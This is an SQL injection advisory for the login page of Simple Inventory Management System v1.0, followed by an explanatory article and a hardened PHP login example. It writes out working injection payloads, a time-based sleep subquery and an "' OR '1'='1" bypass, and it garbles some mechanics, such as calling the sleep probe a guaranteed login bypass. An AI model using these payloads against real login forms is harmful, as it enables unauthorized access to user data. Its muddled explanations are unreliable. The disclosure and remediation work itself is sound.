Simple Inventory Management System v1.0 - 'email' SQL Injection
# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection
# Google Dork: N/A
# Application: Simple Inventory Management System
# Date: 26.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
## Proof of Concept (PoC):
For example, an attacker could submit the following values:
email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
pwd: test
This would result in the following SQL query:
SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
This attack would retrieve all users, making the login process always successful.
Request/response screenshot: https://i.imgur.com/slkzYJt.png
## Vulnerable code section:
====================================================
ims/login.php
<?php
ob_start();
session_start();
include('inc/header.php');
$loginError = '';
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
    include 'Inventory.php';
    $inventory = new Inventory();
    // Vulnerable code: the raw POST values are passed straight into the SQL query
    $login = $inventory->login($_POST['email'], $_POST['pwd']);
    // end of vulnerable code
    if (!empty($login)) {
        $_SESSION['userid'] = $login[0]['userid'];
        $_SESSION['name'] = $login[0]['name'];
        header("Location:index.php");
    } else {
        $loginError = "Invalid email or password!";
    }
}
?>
## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html

SQL Injection in Simple Inventory Management System v1.0: A Critical Security Flaw
On February 26, 2024, a security vulnerability was identified in the Simple Inventory Management System v1.0, a PHP-based open-source application hosted on SourceCodester. The flaw, classified as a SQL Injection vulnerability, resides in the login authentication process and poses a significant risk to any system deploying this software without proper safeguards.
Understanding the Vulnerability
SQL Injection occurs when user input is directly embedded into SQL queries without proper sanitization or validation. In this case, the application accepts email and password inputs via $_POST and uses them in a database query without escaping or parameterized handling.
<?php
// Excerpt of ims/login.php (the full file is shown in the advisory above)
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
    include 'Inventory.php';
    $inventory = new Inventory();
    // Vulnerable: raw POST values are handed to the query without validation
    $login = $inventory->login($_POST['email'], $_POST['pwd']);
}
?>
This code snippet demonstrates the core issue: the login() method receives raw user input and passes it directly into a SQL query. The absence of input validation or sanitization allows attackers to manipulate the query structure, potentially bypassing authentication or extracting sensitive data.
Proof of Concept: Exploiting the Injection
An attacker can exploit this flaw by crafting malicious input. For example:
- Email: test@gmail.com'+(select*from(select(sleep(20)))a)+''
- Password: test
When processed, the resulting SQL query becomes:
SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'test'
Here, the sleep(20) function is used as a time-based blind injection technique. The database will pause for 20 seconds if the query executes successfully, allowing the attacker to confirm the injection's presence through timing analysis. More dangerously, the + operator enables the injection of a subquery that evaluates to a true condition, effectively bypassing the password check.
Even without the sleep function, an attacker could use:
' OR '1'='1
to make the condition email = 'anything' OR '1'='1, which always evaluates to true, granting unauthorized access.
Impact and Risk Assessment
| Property | Assessment |
|---|---|
| Severity | High |
| Attack Vector | Remote, Web-based |
| Exploitability | High (no authentication required) |
| CVSS Score (Estimated) | 8.1 (High) |
| Potential Damage | Full system access, data theft, privilege escalation |
This vulnerability is particularly dangerous because it affects the authentication mechanism—the first line of defense in any application. If an attacker can bypass login, they can access all inventory data, user records, and potentially modify or delete entries.
How to Fix: Secure Coding Practices
Eliminating SQL Injection requires adopting secure coding standards. The following fixes should be implemented:
<?php
// $pdo is assumed to be an existing PDO connection to the application's database
// (the page does not show how the connection is created); the placeholders bind
// the POST values as data, not as SQL text.
$stmt = $pdo->prepare("SELECT * FROM users WHERE email = ? AND password = ?");
$stmt->execute([$_POST['email'], $_POST['pwd']]);
$login = $stmt->fetchAll();
?>
Explanation: This corrected code uses prepared statements with parameterized queries. The input values are passed as parameters, not as part of the SQL string. This ensures that user input cannot alter the query structure, even if it contains SQL syntax.
Additional security measures include:
- Sanitizing input using filter_var() or htmlspecialchars() for email validation.
- Implementing rate limiting or account lockout after failed login attempts.
- Using bcrypt or similar hashing algorithms for password storage, never storing plain text passwords.
- Enabling logging and monitoring for suspicious login patterns.
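The following is an added example, not code from the Simple Inventory Management System or its author. It shows a hardened replacement for the login call in login.php that combines the measures listed in this section: a prepared statement, filter_var() email validation, bcrypt password storage with password_verify(), a failed-attempt lockout, and logging of each attempt. It uses an in-memory SQLite database through PDO so it runs stand-alone (the pdo_sqlite extension is assumed). The table and column names follow the query quoted in the advisory; the failed_attempts column, the MAX_FAILED_ATTEMPTS threshold, the sample account and the function names createDatabase(), secureLogin() and logAttempt() are all constructed for this example.

```php
<?php
// Added example (not the project's code): hardened login for the login.php flow.
// Uses an in-memory SQLite database via PDO so it runs stand-alone; requires the
// pdo_sqlite extension. failed_attempts, the threshold and the sample account
// are constructed for this example.
declare(strict_types=1);

const MAX_FAILED_ATTEMPTS = 5; // constructed lockout threshold

function createDatabase(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (
        userid INTEGER PRIMARY KEY,
        email TEXT NOT NULL UNIQUE,
        password TEXT NOT NULL,
        name TEXT NOT NULL,
        failed_attempts INTEGER NOT NULL DEFAULT 0
    )');
    // Constructed sample account. password_hash() stores a bcrypt hash, so the
    // plain-text password never reaches the table.
    $db->prepare('INSERT INTO users (email, password, name) VALUES (?, ?, ?)')
       ->execute(['admin@example.com', password_hash('correct horse', PASSWORD_DEFAULT), 'Admin']);
    return $db;
}

function logAttempt(string $email, string $outcome): void
{
    // json_encode() keeps quotes and control characters from breaking the log
    // line, so injection payloads are recorded intact for monitoring.
    error_log(sprintf('login %s email=%s', $outcome, json_encode($email)));
}

// Returns the session fields login.php needs on success, null on any failure.
function secureLogin(PDO $db, string $email, string $pwd): ?array
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        logAttempt($email, 'rejected: malformed email');
        return null;
    }
    // The email is bound as a parameter: quotes, '+' or a subquery inside it are
    // compared as literal text and cannot change the query structure.
    $stmt = $db->prepare('SELECT userid, name, password, failed_attempts FROM users WHERE email = ?');
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        logAttempt($email, 'failed: unknown account');
        return null;
    }
    if ($row['failed_attempts'] >= MAX_FAILED_ATTEMPTS) {
        logAttempt($email, 'locked: too many failed attempts');
        return null;
    }
    if (!password_verify($pwd, $row['password'])) {
        $db->prepare('UPDATE users SET failed_attempts = failed_attempts + 1 WHERE userid = ?')
           ->execute([$row['userid']]);
        logAttempt($email, 'failed: wrong password');
        return null;
    }
    $db->prepare('UPDATE users SET failed_attempts = 0 WHERE userid = ?')->execute([$row['userid']]);
    logAttempt($email, 'success');
    return ['userid' => $row['userid'], 'name' => $row['name']];
}

$db = createDatabase();
// The two payloads quoted on this page are handled as plain data.
var_dump(secureLogin($db, "test@gmail.com'+(select*from(select(sleep(20)))a)+''", 'test'));
var_dump(secureLogin($db, "' OR '1'='1", 'test'));
// Valid credentials still log in and return the fields login.php stores in $_SESSION.
var_dump(secureLogin($db, 'admin@example.com', 'correct horse'));
```

Run it with the php CLI: the two payload attempts return null (the first is rejected by filter_var(), and even an input that passes validation is only ever compared as a literal email value by the prepared statement), while the valid credentials return the userid and name. The login.php code can assign those two fields to $_SESSION exactly as it does today, so the change is confined to the data-access layer.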
Recommendations for Developers and Users
Any user deploying this system should:
- Immediately patch the login functionality using prepared statements.
- Review all other user input points—such as search, update, or registration forms—for similar vulnerabilities.
- Disable public access to the application unless behind a firewall or authenticated proxy.
- Use automated tools like SQLMap or OWASP ZAP to test for injection vulnerabilities during development.
For open-source projects like this, developers should prioritize security audits before public release. The lack of input validation in a widely distributed system demonstrates how easily insecure code can become a widespread threat.
Conclusion
The Simple Inventory Management System v1.0 serves as a cautionary tale: even basic applications can harbor critical vulnerabilities if security best practices are ignored. SQL Injection remains one of the most prevalent and dangerous web attacks, and its presence in a seemingly simple system underscores the importance of vigilance in every line of code.
Always assume user input is hostile. Validate, sanitize, and use parameterized queries. Security is not an afterthought—it is the foundation.